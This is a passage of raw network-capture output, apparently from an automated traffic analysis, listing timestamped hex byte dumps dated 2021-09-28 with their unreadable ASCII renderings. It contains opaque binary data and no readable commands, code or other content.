48 ef 8e ca d0 f5 15 5c b1 4f 4a f3 c1 fc 7b dd 90 0a a6 7d a9 50 bd 36 b6 05 3f ed 4f 59 a8 5b 4b 8d 98 28 99 24 9e e0 0b c5 6b d6 eb 08 95 1d 22 de c2 9a 74 df 9f fb e2 97 bc ad
                                              Data Ascii: :iu8~I{)nrwl.<$Z]A#nzCGx=Z+BWb`.pLG-/B"DZ]JSym6:R*Y+t[ too0fl;C;Cu8Dz0vB3H\OJ{}P6?OY[K($k"t
                                              2021-09-28 11:02:14 UTC75INData Raw: 8a f9 00 f5 57 51 12 41 8c e0 c0 0b 55 58 9a ad f3 f7 9a e2 e7 f6 f2 6c 86 66 72 5a f8 b5 00 a2 05 1c 01 72 27 f5 a5 d7 e0 ba 37 d6 9a 4f c6 3b 90 44 ce 4c 8d 99 d4 52 37 0d b2 26 6e 9a dc d1 64 4b 41 f6 01 df 07 7b 53 88 ee 9a b1 43 fb 1d a9 aa b3 ae 71 ec ce 3f 0d 8d 92 95 b3 8a b9 43 6e 30 f0 78 a8 9f a1 f0 1b 9f 23 ac 30 92 e9 38 b2 55 c4 fb 30 d4 06 e6 9f 07 75 21 93 c8 aa 27 7a 91 1c 0f 6e 3f 3b 49 78 45 58 b7 86 7c f0 f5 3c 2b 11 4d 66 2d e7 50 28 5c 9b 07 dd 0c 08 d1 1b de d1 aa 7c a7 8e 50 62 a4 5d 24 53 98 fa 0a 2b fd 7e af e8 a5 ca f5 a2 0d 59 6a 60 c6 a2 71 ca a3 df c7 b3 2d 02 ab 92 36 42 e2 e3 40 be a7 cf 62 55 48 78 87 c6 a7 c4 1e 31 4a f4 b9 a1 b3 6f 7f e8 6b 83 0f aa ec 1d 48 b8 72 7f eb ac b6 26 d8 85 86 3e ef c1 36 ad bb f0 89 bb 18 46
                                              Data Ascii: WQAUXlfrZr'7O;DLR7&ndKA{SCq?Cn0x#08U0u!'zn?;IxEX|<+Mf-P(\|Pb]$S+~Yj`q-6B@bUHx1JokHr&>6F
                                              2021-09-28 11:02:14 UTC76INData Raw: 66 03 5f 4c 52 2c d9 8d 0a 0c b3 a1 ea 03 78 ed 82 08 4a cb c3 2c 1b d1 99 2b 7f 7c 6e da fb df bf 62 92 b2 21 47 e6 17 84 28 9a b5 c0 8b 5b 37 f0 71 80 81 a6 02 2e 8b 78 f8 54 91 1f f5 32 8b 36 b9 05 3f 60 67 93 c7 da ed 06 44 48 66 00 eb 11 aa 72 cc 94 4d b8 7f a9 5c bd 3d b5 05 3f fa 2a 34 88 59 41 87 94 29 85 2f bf 66 f1 c4 41 b7 c2 79 9d 19 33 df bc 9e 19 fb 97 f0 fe 8b b7 b5 f1 e9 01 53 12 8c 87 57 dc 8d 95 f3 2a 10 bc 8f 91 1a 63 62 24 51 ab 9f 83 d7 16 08 51 8e 5c 97 c9 55 06 e5 b9 90 7e 98 6c b8 09 c4 2c 0b 68 3a 49 63 6b 22 ac 07 b9 58 0a 7d a7 0b dd ce d7 2f 93 7d 97 23 1b 73 f6 54 a5 72 9e d7 e9 42 59 33 c7 84 08 1a cb 02 7d 7b c9 e0 9d 20 68 c2 e5 c3 0b af 6b 68 52 25 c8 e3 36 6e 92 f2 f9 67 65 71 75 8e 14 95 f6 8b f1 1d 94 6d 7b 39 92 3c 0d
                                              Data Ascii: f_LR,xJ,+|nb!G([7q.xT26?`gDHfrM\=?*4YA)/fAy3SW*cb$QQ\U~l,h:Ick"X}/}#sTrBY3}{ hkhR%6ngequm{9<
                                              2021-09-28 11:02:14 UTC77INData Raw: 19 f7 96 1c aa 6f 2b 3e 4b 5b cd 43 b7 8b 43 92 f4 10 23 1a 4f 77 2d e5 86 8c 74 99 16 c1 81 08 c9 e5 de ee b8 46 b5 b3 9b c8 db 31 22 f1 8d c0 3c 3d ea 2b 60 e8 a5 c4 cb 8a aa 5d 79 56 d2 2f 5e ca a3 de 42 a7 39 3b 1e 99 1d 53 ca 78 57 40 ac f0 68 5c 4a 54 d9 c1 50 ed bd 32 5d f5 94 f6 ba 99 52 88 78 a0 25 0e 0e 1f 39 f8 31 0c cd 84 80 22 c8 a7 86 34 fe c2 63 d7 ba f0 8b fe 3c 44 bb 6a 54 62 ff 11 60 f4 18 11 aa 99 fe 24 99 e4 bd 96 f5 12 be c7 52 e7 f5 eb 4d b9 8f ba b2 7d 79 e7 cc 0a f1 1d 07 72 5d 2b 2d 50 6f 52 5e 62 40 e7 2f d8 5e 2c 83 5e e9 58 62 ee 0d 96 35 c5 64 34 f2 e8 49 6f 9a 78 dd 20 e8 c0 e2 19 d3 2d b6 11 10 61 4f 1d e4 fa de e2 8f 29 0f e8 53 d1 bd 9c 03 45 b4 8f d3 3f e0 64 36 f2 bc 4a cb 7b 23 c9 d5 94 c2 67 53 a7 f9 6c b1 e8 4e 3e 32
                                              Data Ascii: o+>K[CC#Ow-tF1"<=+`]yV/^B9;SxW@h\JTP2]Rx%91"4c<DjTb`$RM}yr]+-PoR^b@/^,^Xb5d4Iox -aO)SE?d6J{#gSlN>2
                                              2021-09-28 11:02:14 UTC79INData Raw: af de fb ff 7a 3e 99 83 77 e5 88 84 e3 37 13 89 8f 96 07 8b 23 b4 53 b3 94 9c c1 0d f6 59 bd 4b 7e c3 79 09 c5 dd 90 52 9a 58 ac 2f 27 27 6f 02 c4 48 4b 54 04 86 3f c1 24 0c 6b 8b 0f dd ce dd 2a e3 99 69 f4 e4 6c e1 51 a5 7b 91 3f e3 45 57 34 e8 a5 f3 1b e1 16 4d 5e c9 e7 81 c8 29 cb 18 2b ff b0 65 7d ac 2d fb f5 e3 6d 95 1f 2b 07 18 71 77 a2 2a b7 f4 82 80 7f 81 60 7f 1a 8f c2 0c 26 60 e8 a8 8f 2a 8a 15 98 a3 f3 d9 1e e4 be 6d 7a e9 a8 6b 86 e4 2a 6a 37 c7 41 9a 2c 68 6a f1 f9 cc 8f 81 9d 55 95 8b b8 6b 51 df 45 91 ed 4b 0c f2 df 12 a9 9d 9d a7 24 7d f2 b9 98 6f d9 a5 8d 90 2f 02 77 9a 3b 95 60 54 83 d6 61 8f 2b c8 b5 a0 b2 2f 7b 4c 20 de c3 35 96 c1 b6 71 6f 5c 84 2e f7 49 4d 9f 41 9a 1e c0 34 58 5e 9e bb e5 ea c6 f2 c4 e7 c9 7f bd 91 64 36 0a 9a 00 a6
                                              Data Ascii: z>w7#SYK~yRX/''oHKT?$k*ilQ{?EW4M^)+e}-m+qw*`&`*mzk*j7A,hjUkQEK$}o/w;`Ta+/{L 5qo\.IMA4X^d6
                                              2021-09-28 11:02:14 UTC80INData Raw: 6f 88 bd 56 62 d7 8d 66 eb 92 0e 8d 14 ee 30 9f e0 c8 0d e4 f3 91 f7 cc f9 e1 c4 6a 24 71 bb 9e e3 68 f3 fc 12 a0 7f 00 41 6e 16 b3 7d 93 62 05 d0 40 e7 2b 6e 7a 31 b3 3c 88 c4 64 f5 13 8f 2f 59 71 1b c3 c8 6b 6f 9a 78 41 26 f7 f6 c0 af c4 2d b6 87 15 53 73 15 27 ff de e4 60 09 12 d0 46 a2 23 99 34 e6 90 0a d5 ef f5 f8 30 ec ae 7e 3a 7b 29 a6 6e 90 dd 56 5b f3 f9 6c bb 1b 57 20 0e d5 5e 3b ba 9d 20 bd e6 c2 87 63 5d 02 da 88 2c a0 c8 f9 6e e6 9d 0a cf d2 7c 42 cd 61 5d e4 3d 81 1f ea 72 fb d3 b8 ff c7 0e ab 82 b3 7b 07 5a b8 f4 55 cd b8 ca bc 35 aa 2a 97 b8 4e 58 6e c3 5e c5 1f e1 96 09 31 a8 e5 78 51 80 06 86 52 51 67 72 bd 5b 83 71 41 01 b5 40 c4 76 37 4f 4d 30 16 c1 d1 78 26 97 ba 36 95 b5 b8 b7 34 27 71 84 1d 10 94 57 b1 1d ce cb 3f 1a e0 61 da a7 3e
                                              Data Ascii: oVbf0j$qhAn}b@+nz1<d/YqkoxA&-Ss'`F#40~:{)nV[lW ^; c],n|Ba]=r{ZU5*NXn^1xQRQgr[qA@v7OM0x&64'qW?a>
                                              2021-09-28 11:02:14 UTC81INData Raw: 04 23 ae eb 84 a5 3d 86 15 98 ba 0d c9 24 ed be 74 51 23 97 02 87 c8 22 75 26 c0 c8 3b c8 b3 29 e1 ef c7 85 ac 85 ab 94 b4 8a 45 53 01 a6 93 96 99 0c f2 ca 2e 86 b4 dd da 53 67 0c bc 9e 51 cd a7 81 9d 2f 01 62 73 47 3a 62 4c 8a fc 7b a6 d7 c9 b1 aa b0 07 42 4c 20 c5 f8 1c a7 d7 b6 7f 60 5c 84 2e f0 55 52 ce 5f 81 e0 c8 0e a4 48 b9 b9 f5 ff 38 fa f3 1b e3 51 94 59 64 66 ce e9 29 a0 04 05 1b 64 59 c9 b0 4b fb a9 4f d5 3f 4f cc 36 d9 7f dd 5a 17 9d 70 47 27 1d 00 e6 7e 9a d6 df e4 52 53 f4 28 aa 13 7b 59 aa 7a aa b0 45 d9 4d bc aa b9 87 12 e8 df 3e 1d ad 1f 0d b3 8c a4 9f 41 ab f0 79 b1 a7 74 e2 0d b1 ad 9b 31 94 41 01 8e 43 d0 e5 1b 5f c2 e4 95 15 75 a1 97 c8 a6 5e da 94 1c 05 68 44 05 5f 50 ec 4f d8 a2 56 6c ff 3b 4e 28 46 77 20 e4 17 a2 5a 9b 0b cd ee 25
                                              Data Ascii: #=$tQ#"u&;)ES.SgQ/bsG:bL{BL `\.UR_H8QYdf)dYKO?O6ZpG'~RS({YzEM>Ayt1AC_u^hD_POVl;N(Fw Z%
                                              2021-09-28 11:02:14 UTC82INData Raw: dd 24 80 72 f7 47 ac 04 ce 0d a9 7a c4 4e 59 56 08 84 3c b6 4e 3f 60 86 0d 63 ca dd 3f bc 57 69 dc ee 6b f0 55 ca 4f 82 29 e2 46 f3 30 ef b4 1b 32 e3 14 55 5f df d3 9c 3f 00 27 1e 3c f2 df ae 65 52 26 d0 e6 c4 00 8a fe 29 76 4d b0 73 a6 06 83 de af fd 02 8b 76 48 3b 86 ea ce 31 50 ec c7 6b 2a 8a 1f 97 b2 ff a7 3c ed 95 7c 52 2d bb 95 81 de 00 5c 3c c7 4c 9a e1 62 4f db 2a c3 8f 80 ea 67 94 a7 b0 47 42 f8 c9 a7 94 35 06 da 1e 3c 8b 99 88 f2 74 7d f2 b7 a4 66 d0 84 b2 56 2b 08 73 e2 8a 16 60 5e 80 ed 7e d0 1d ca 9d aa 9a e8 77 4c 26 d9 fd 10 bd da bc 60 4b a9 8c 2a 3d 55 46 99 29 40 e0 c1 12 72 80 91 bb e4 f5 29 ff 87 d1 e0 7d 9c 1d 85 4c 75 90 15 91 0a 06 17 72 3a 8c 86 49 f1 a1 4f 32 3d 4f cc 20 ba 42 09 49 11 a4 c7 52 34 25 20 f1 80 65 d5 c8 b0 48 4d e7
                                              Data Ascii: $rGzNYV<N?`c?WikUO)F02U_?'<eR&)vMsvH;1Pk*<|R-\<LbO*gGB5<t}fV+s`^~wL&`K*=UF)@r)}Lur:IO2=O BIR4% eHM
                                              2021-09-28 11:02:14 UTC83INData Raw: 17 fa ea 06 4f 56 18 d1 7a a0 5a 21 1b 96 19 20 f0 7c 37 93 2a 87 49 6b f6 d9 91 33 e9 66 00 e0 64 f4 6f 9a 79 cb 08 d3 c2 e0 3b d5 29 a9 12 9f 73 44 35 db e9 f6 d8 fe 0f 07 c0 64 a9 bf 95 03 67 b0 8f df c3 ec 79 25 fa 94 4f c2 66 d7 a7 de 90 d4 07 51 25 ea 65 bb 96 58 21 cc f4 d8 16 ab 99 ab 37 c6 ff 98 17 d7 2c 34 b7 0c 6b e4 b4 7f 7f 8d 17 8b 0a e0 44 d6 22 d7 67 44 c1 ea 69 1a 62 c3 8f 81 d1 92 a7 b7 ef 52 f6 53 b8 e5 c0 d1 59 8f b0 af ae 29 4d a8 77 47 2b e2 95 c1 04 f2 03 0f 3f e7 d3 29 50 ac 05 0d 47 47 20 43 34 44 8a 8f dc 2b a8 23 de 76 b7 b6 ad 86 18 a5 52 77 b5 e2 a5 3d 08 a5 8f 0d 2a 56 e7 ae 00 4b 81 4e 21 06 dc 90 33 74 7a 4b dd f8 24 a8 4c e1 4c 3b 45 e2 13 8c e1 06 29 cd 83 9d 37 fa 5f 95 92 9d 38 2f 9c a4 ed 6f b7 0c f2 13 ee 67 43 13 e5
                                              Data Ascii: OVzZ! |7*Ik3fdoy;)sD5dgy%OfQ%eX!7,4kD"gDibRSY)MwG+?)PGG C4D+#vRw=*VKN!3tzK$LL;E)7_8/ogC
                                              2021-09-28 11:02:14 UTC84INData Raw: aa bc a9 92 2b fc 40 53 f5 b7 9b 90 b9 4a f2 db 39 a3 32 9e da 50 55 c1 bc b2 5f cc 01 a5 90 2f 09 5d be 47 16 6a 7c dd fc 72 b5 46 49 9c a0 b4 a3 4c 4c 20 ce c6 38 a2 c8 a5 79 78 b3 8a 1d da af 47 b3 4f b4 6a c7 18 5a 56 a5 a8 ed f2 29 fc f7 d5 1c 7c ba 53 64 36 bd 9a 00 a6 77 31 12 63 3c fb d8 38 b0 a9 20 f4 15 0f c4 31 bc 43 9f b4 e1 4a 34 5c 16 08 27 0e 6e 95 c5 25 b5 72 77 f4 03 84 2d 79 53 88 df c4 c3 02 f3 69 b6 82 f1 ad 62 e3 f7 7b 1b a5 3d 89 dc 08 af ce 6f 43 ce 7b bb 85 ce df 0f b7 8f 80 75 96 4b 23 8a 07 d2 ef 12 7c 1c f5 9a 13 4c 89 88 e8 52 30 db b7 15 1e 66 22 3e 54 c6 f9 54 dd 56 38 4f f5 3c 21 02 44 77 2a b3 23 a5 c9 9b 01 c0 38 90 ce 3a cc cd ba 7c b8 83 86 cb 8c 53 20 8a 40 ea 1e 3b d0 b0 08 e8 a5 dc f2 85 aa 4c 65 79 fc d1 77 e6 e0 dc
                                              Data Ascii: +@SJ92PU_/]Gj|rFILL 8yxGOjZV)|Sd6w1c<8 1CJ4\'n%rw-ySib{=oC{uK#|LR0f">TTV8O<!Dw*#8:|S @;Leyw
                                              2021-09-28 11:02:14 UTC86INData Raw: 84 4c d5 a7 bf f8 83 ac 9d fa 59 9e 9c b8 f4 cd cd d4 b0 9e a2 a0 3b 92 57 09 45 2b e9 ae 87 1d e1 00 06 38 78 b6 96 53 80 0c 32 16 4c 20 58 34 4c 15 02 9c 05 aa 02 f3 0c a9 49 58 70 11 37 3e 3f 3b dd af 15 4b b1 a7 f6 22 4f 7b f1 43 5e 8b 53 05 59 d3 86 2a 5a 3f 65 c5 e3 28 a4 d8 2d e5 29 44 e6 1d e6 ed 97 b5 cd 8b 7c da fe 5d 84 8a 91 7b d5 8a 52 da 7e bc 6c cb 3a 9d 7c 5b 08 55 13 39 8c ca d0 cc 5b 4f b6 6d 3d fe d9 2e 01 8b 97 65 a6 57 eb 54 d2 2a 9f 46 37 fe 4f 32 e5 dd 4a 8b 8d a4 9b 25 a9 39 1c ca 6d a8 ce 10 6b 1a 1f d0 c5 9b 00 e8 92 fb f5 89 a8 b5 10 f8 d3 40 3c 9e 94 a9 68 a3 95 f5 3e 45 5b 8f 91 14 6a 28 8b 5e ab 8e 93 d9 33 f6 59 bd 68 6b b3 b1 0e dd 27 e2 40 9a 73 a4 1c ae 56 55 7c c4 42 67 3e 24 84 36 aa 18 c5 69 8f 25 c2 e7 ce 36 d3 8a 66
                                              Data Ascii: LY;WE+8xS2L X4LIXp7>?;K"O{C^SY*Z?e(-)D|]{R~l:|[U9[Om=.eWT*F7O2J%9mk@<h>E[j(^3Yhk'@sVU|Bg>$6i%6f
                                              2021-09-28 11:02:14 UTC87INData Raw: f6 00 ec 6e b0 53 82 c2 85 a3 41 f9 41 e6 aa b3 a5 75 3f 52 12 19 a5 35 ec 78 8c ae ca 7f 38 d8 23 bb 8f ba f3 1c a4 83 90 a1 91 4b 29 a0 42 a3 d1 1a 77 0c f8 ff 60 1c 84 97 c2 84 73 f5 96 16 1e 69 33 f7 2e 17 e4 58 bd a4 16 6e f5 36 09 41 46 77 20 eb 17 09 59 9b 07 c1 82 7c ef 19 df c8 a5 09 dd eb 39 c8 a0 57 0a b1 8b ea 14 29 c7 52 0b eb 72 cb e3 8d 2e 32 eb 67 d0 29 fa f5 a3 de d2 b4 35 28 0f 16 27 44 e2 25 40 be a7 b3 e8 45 41 52 cd dd ac eb 1d 76 4a fe 95 e0 ae 60 df e2 7a 8b 26 0d 40 1d 42 9f 19 3f c8 ae bc 37 47 b0 97 34 ff e0 2d bb ba fa a7 8e 3c 44 a2 35 d7 63 d7 17 ec cb be 11 ab 9b e1 2d c9 34 bd 91 e6 e5 ae ed 86 70 d4 eb 4a ad 73 bc 12 39 6e ec cd 1c e5 e4 8a 18 5f 00 2e 53 21 50 25 06 68 d4 2a f2 76 39 0c 1c 87 58 63 c2 14 91 1f cf 5f 5e f6
                                              Data Ascii: nSAAu?R5x8#K)Bw`si3.Xn6AFw Y|9W)Rr.2g)5('D%@EARvJ`z&@B?7G4-<D5c-4pJs9n_.S!P%h*v9Xc_^
                                              2021-09-28 11:02:14 UTC88INData Raw: 2e 64 0b c9 c8 da ee 31 0f b4 67 26 da 82 f4 72 c6 84 60 bd 72 26 7f d2 20 b5 7e f8 fe 45 2e 3d 36 59 8a 8b 29 2a 04 e2 7d 74 0e 6d b9 c5 03 84 1d e5 5a f9 97 1b f9 e6 2b e4 86 b3 ad e3 fb f8 21 00 9b 83 75 f4 80 e6 b4 3e 38 98 a7 d3 12 75 28 89 55 d8 d8 9e c6 11 20 1a 93 49 63 e0 3a 0c dd 29 80 7b 89 7e 21 2d c4 25 16 05 09 48 4f 7a 91 eb b8 bd 58 0a 43 c3 27 dd c4 7f 28 d7 f1 78 d9 f5 61 6e 70 a5 7b 82 52 25 6e 4c 30 39 05 1e 1e dc 19 42 83 da ed 86 3b 39 f5 24 a9 09 4f 9d 74 54 3b 01 e4 ce 7e b8 ed 38 42 03 8b 88 59 38 9c f7 81 fd 00 fa a6 7b 30 8b c1 88 a4 4b aa 52 a7 2a 8a 17 93 d0 cd ca 08 e5 8c 1c 09 af bd 95 8d e0 6a 70 3c cd 6e cf d0 69 4c eb 81 43 8e 86 83 d8 aa a5 ba 4a 2d cb a4 93 9c 1d 49 f0 db 32 a3 d9 9c da 50 6e fd ab a3 5a c8 9e 89 80 04
                                              Data Ascii: .d1g&r`r& ~E.=6Y)*}tmZ+!u>8u(U Ic:){~!-%HOzXC'(xanp{R%nL09B;9$OtT;~8BY8{0KR*jp<niLCJ-I2PnZ
                                              2021-09-28 11:02:14 UTC89INData Raw: cd e3 a5 39 00 08 92 36 4e ca 7f 51 a8 a6 f7 71 44 46 43 20 d6 82 ee 89 3b 4a f9 82 0f a3 4b 51 b3 71 8b 20 3d 13 1c 6e 97 1a 0e e2 4d b4 5b 00 8f 97 30 70 7f 34 ba ba e3 bf d7 3c 31 a8 5a 56 6a d7 11 71 e2 b5 3a f1 88 ef 35 4c fe 91 8b e6 ee c4 20 50 ff fa e8 c5 85 71 bb 9c 04 be ec cc 09 67 54 34 1e 4b 2a 34 70 8c 57 32 f2 41 cb 29 ea 77 2e 87 3b 79 59 4e e7 24 92 64 0e 77 04 f2 66 7c 5d 51 61 d6 20 ef d9 1e 30 e8 29 a2 31 09 47 44 32 cc 01 df c8 fe 18 06 e8 5e b0 41 9e 07 dd 9b 8d fe 4c f7 1f fd f3 94 5a c8 f4 03 a6 f2 94 b9 bd 7b 3b fd 68 21 ad 51 3f 32 e6 c4 38 ba 76 bc bb f9 47 98 16 d0 12 d6 b2 34 b4 c8 f9 6e 7a 8a 11 e7 32 e1 68 d1 39 55 7c 3b 8f 5a ec f5 66 f9 a9 ab d2 e9 61 9d f0 5f 6b ed b5 f8 d3 d8 a3 8e 8d a6 b5 21 69 25 64 41 3f c9 99 c9 0c
                                              Data Ascii: 96NQqDFC ;JKQq =nM[0p4<1ZVjq:5L PqgT4K*4pW2A)w.;yYN$dwf|]Qa 0)1GD2^ALZ{;h!Q?28vG4nz2h9U|;Zfa_k!i%dA?
                                              2021-09-28 11:02:14 UTC91INData Raw: 63 a8 f6 6c e1 42 b6 76 91 21 c0 29 4d 34 e5 a3 00 75 db 15 55 5f a6 c4 95 36 2e f1 09 39 e0 a3 64 73 43 2b 59 40 df b5 ad ea 3a 73 4e 58 66 a1 11 9a 67 97 d3 25 90 66 6a 37 9e cd 9d 2a 5f 8b 80 4d 2b 8a 1f b8 77 f2 c8 02 c7 b1 76 7a e4 ac 93 96 c7 3f a4 2f c8 57 83 c3 7f 77 22 ff cf 9e 80 ea 8d 96 a7 bc 51 5b dc 74 97 96 33 63 d8 d9 38 8d 99 8f d2 35 68 f3 bd b8 44 ca 9a 4c 83 3e 19 64 9c 54 98 d7 6b 25 02 8d 40 f7 c7 b8 88 85 2f 73 46 33 df fd 06 bd da bc a8 78 a4 af 02 f5 10 5a 9f 46 8c e0 c1 18 42 49 95 bb 6f f3 38 f3 4d e4 e2 7d 99 72 66 4d 6f 9a 00 a3 32 0d 6e 11 37 e3 b8 5c d9 f9 22 fe 37 65 c6 31 a5 65 dd 5a 2f b5 cb 43 22 1b 28 1f 69 91 f7 c0 b4 59 56 08 01 db 11 63 58 82 c1 b8 4e 42 dd 6b ab a1 b3 a8 7a 17 de 14 1b 8e 35 ba 50 8e d5 9d 6b 30 fa
                                              Data Ascii: clBv!)M4uU_6.9dsC+Y@:sNXfg%fj7*_M+wvz?/Ww"Q[t3c85hDL>dTk%@/sF3xZFBIo8M}rfMo2n7\"7e1eZ/C"(iYVcXNBkz5Pk0
                                              2021-09-28 11:02:14 UTC92INData Raw: e2 16 ca 43 88 69 d8 36 e1 c8 f1 34 4a 9a 9e 2e 12 4c 4e 2a cf ec d4 e4 ed 05 10 16 58 87 b5 8e 2f e5 3a 8f d5 ef eb 77 3c f3 85 54 d4 77 d7 a7 de 99 c5 7a a1 2c 2f e1 90 87 51 3e 3f ea f9 28 b0 9d ad b1 e6 ec 66 17 ed 02 ee bb 13 75 db f3 6e 6b 91 0a e6 32 e1 68 d8 30 4e 6f ed 8d 56 ea 1c 74 df a7 ac da 8d bd 63 f1 77 ec 62 19 f4 c9 cb b8 9f 8f a8 aa 3b 9d 3d b6 46 07 e5 85 d6 18 fb 19 05 2e ff cf c8 43 7e 07 36 5f 5f 25 68 4f a4 7c 8e c2 14 b9 02 db 5f a1 56 5d 87 08 8d 4a 68 2a d5 ba 2d 1a b9 a7 ed 21 49 e4 7c 03 70 80 5e 3c 1f 5f 31 f6 79 63 6d d6 e3 21 af 44 86 74 3a 69 ec 06 9c 2a 91 2f da 90 5a da fb 5d 84 8f 96 c0 2a a7 7b f8 77 a6 0c ff 38 8c 7c 5b 15 c1 61 54 85 db d3 f5 11 d7 a5 62 33 e0 d2 fc 72 dd 9f 72 52 7e 85 55 ca 33 bd 05 24 f4 5a 24 74
                                              Data Ascii: Ci64J.LN*X/:w<Twz,/Q>?(funk2h0NoVtcwb;=F.C~6__%hO|_V]Jh*-!I|p^<_1ycm!Dt:i*/Z]*{w8|[aTb3rrR~U3$Z$t
                                              2021-09-28 11:02:14 UTC93INData Raw: 2d 73 a9 8d 46 12 71 5f 90 2a e8 ac 25 ca e6 7d b2 2f 77 60 6e de d3 2f b1 ce 9e a0 7c a2 83 14 78 56 46 9f 47 98 f4 d5 30 f9 49 95 b1 ca 6e 38 f3 e2 f4 ee 69 be cc 64 4d 73 8c 8d a5 04 0f 11 77 22 f7 9a e8 f1 ab 2a d6 67 4f c6 3b a7 58 ab 68 1d b5 c9 41 5c c2 28 0e 7b b2 a9 db b4 58 52 fc 2b b0 02 7d 42 8e d2 86 66 47 f1 6f aa 27 b4 af 62 e8 cb 2c 0d 8d 94 91 b3 86 86 52 69 30 fa 68 b7 9b 98 5e 0f b7 83 be bd 93 4b 29 a3 55 c4 fb 30 d4 06 e6 9f 3b 07 86 97 c2 bd 3c 83 a4 1c 0f 6d 3f 07 28 50 e6 5e a4 86 45 66 e3 12 2e 01 55 7d 22 db d7 8c 58 9d 27 dc 92 08 fa 14 ce c9 ad bb a4 93 69 c1 b1 52 1c d9 76 15 e1 2e ee 6f 80 e8 a5 c0 e3 f1 76 5d 6a 62 d2 54 aa ca a3 da 5d 10 2e f0 92 81 38 4a b1 a2 40 be a9 f0 71 55 47 53 cf d3 bf e2 e5 02 4a fe 96 f3 d9 be 53
                                              Data Ascii: -sFq_*%}/w`n/|xVFG0In8idMsw"*gO;XhA\({XR+}BfGo'b,Ri0h^K)U0;<m?(P^Ef.U}"X'iRv.ov]jbT].8J@qUGSJS
                                              2021-09-28 11:02:14 UTC95INData Raw: 39 f0 01 1e 24 fa ed 6b 53 80 00 0c d9 49 20 52 3c 4f 97 65 f5 a4 aa 08 d1 66 ba 49 52 73 66 cc 4f 7e 33 fb b4 36 21 97 a4 fc 2d 39 81 80 02 56 ad 57 28 0a da e9 f2 72 7c 6d 94 e7 25 f8 62 93 8e 1b fe e7 17 9b 6f bc b1 cd 8b 17 9d f9 75 1a 84 8e 34 07 d9 6f ea 6b 25 0c e5 3b 8c 66 15 15 2f 7f 42 e1 a4 d8 e4 13 5e b9 76 23 e7 fa 45 72 cc 95 74 bc 6e a6 41 04 4f bf 04 35 f4 41 02 e5 5b 4b 81 a7 2d 8b 3e a6 69 1e ca 02 56 c1 0a 9f 4a 18 c7 dd 93 5d d7 94 ff c4 3d b6 bc ee ad d4 56 3a 86 d3 2b ce f6 9d ea 06 57 fc 8d 91 1a 66 33 89 40 be ac dc c5 13 59 49 95 5e f3 db 6b 1f cf 3c ab 11 f6 71 ae 0e d7 34 05 6f d1 66 19 6f 34 95 2d ab 8e 63 63 8e 25 d7 ca f5 56 d1 9b 63 f1 f6 62 e5 1f 89 72 84 09 53 6f 4c 34 bb 99 09 1e d2 44 01 7e e6 e3 9f 20 39 f6 75 d3 f4 b0
                                              Data Ascii: 9$kSI R<OefIRsfO~36!-9VW(r|m%bou4ok%;f/B^v#ErtnAO5A[K->iVJ]=V:+Wf3@YI^k<q4ofo4-cc%VcbrSoL4D~ 9u
                                              2021-09-28 11:02:14 UTC96INData Raw: 8d 95 bb 8f b4 e2 1b ca 68 a8 30 90 49 2a df a4 d0 ef 1c 75 02 9b 73 13 5d 82 95 e8 ac 71 f6 96 91 24 6f 2b 2e 20 b7 e6 58 b3 8e 27 1f f7 3c 2b 7f a7 77 2a f7 7a f6 bb 9b 01 ce 83 60 9e 1a df c8 b8 1e c4 9a 78 c0 dd b9 22 f1 8d e8 65 db e9 56 08 ea ca 8f e0 8a a0 5f 11 85 d0 2f 72 c8 d8 39 d3 a7 3d 3c 0a e9 d1 48 ca 7b ce 09 c2 a8 68 44 4b 56 a5 33 ae ec 95 32 31 19 94 f1 a6 71 51 df 9d 8b 27 21 63 aa 2d e1 33 0c c3 ac cd c3 cb 8f 93 20 00 ce a9 bb ba f6 fc a1 3e 44 a2 35 20 60 d7 1b 62 8f 5a 11 aa 8c fc d1 b4 48 bc 91 e4 9f ca e9 50 f5 91 9d 48 af 7b b9 89 02 86 ec cc 09 c3 e3 06 4d 6f 03 2f 9b 8d 50 25 c6 40 e7 3a e4 6f 28 b8 f1 86 58 62 ea 36 96 00 d1 89 05 da f9 c9 7e 9e 0c 44 20 e8 c1 9d d5 c4 2d b2 04 06 5f 42 35 cb f9 c0 1a fd 23 1d ea 22 40 bf 9f
                                              Data Ascii: h0I*us]q$o+. X'<+w*z`x"eV_/r9=<H{hDKV321qQ'!c-3 >D5 `bZHPH{Mo/P%@:o(Xb6~D -_B5#"@
                                              2021-09-28 11:02:14 UTC97INData Raw: 8e 4b 4f a3 c6 22 88 25 a7 7b 05 e9 6a bf b5 9d 95 1b 32 ff d0 bf 65 f9 9d f1 f2 1c bc 62 e0 dc d7 65 3e 99 89 72 cd b0 95 f5 36 e6 92 88 bb 10 74 32 98 51 ab 9f bc c6 10 23 58 9f dc 69 c8 78 e4 df 0b 86 7e 98 79 ac 12 b9 2f 15 7e c0 4a 59 03 2d 85 3c b8 5a 7f 14 8d 25 d7 b3 d1 38 d3 9f 6b a2 77 6c e1 53 d8 74 81 29 ec 6c 58 49 ff b3 0d 1e cf 02 3f 28 d8 e1 97 32 02 dd 18 2b 9b 0d 63 65 54 2e ff 77 ca 6f b4 d6 03 7f 49 77 75 c9 c8 94 f6 87 d7 02 81 60 68 00 8c c2 6a 35 50 ea 66 a7 2a 9b 01 10 b7 f2 c8 0c cf 20 77 7a ee 97 14 85 c8 22 f2 29 c6 46 88 f2 69 47 f3 ee 4a f4 86 85 aa 14 b3 bb 40 57 e2 d8 87 97 35 08 7c 6c 2f 51 92 95 f1 75 7a 4a b7 a4 59 dd 9a c5 86 19 04 55 ad c5 ae 8d 52 90 98 13 b5 02 cc 9b b7 d6 25 7b 5b f6 c3 dd 23 8c 38 c8 62 79 a2 81 05
                                              Data Ascii: KO"%{j2ebe>r6t2Q#Xix~y/~JY-<Z%8kwlSt)lXI?(2+ceT.woIwu`hj5Pf* wz")FiGJ@W5|l/QuzJYUR%{[#8by
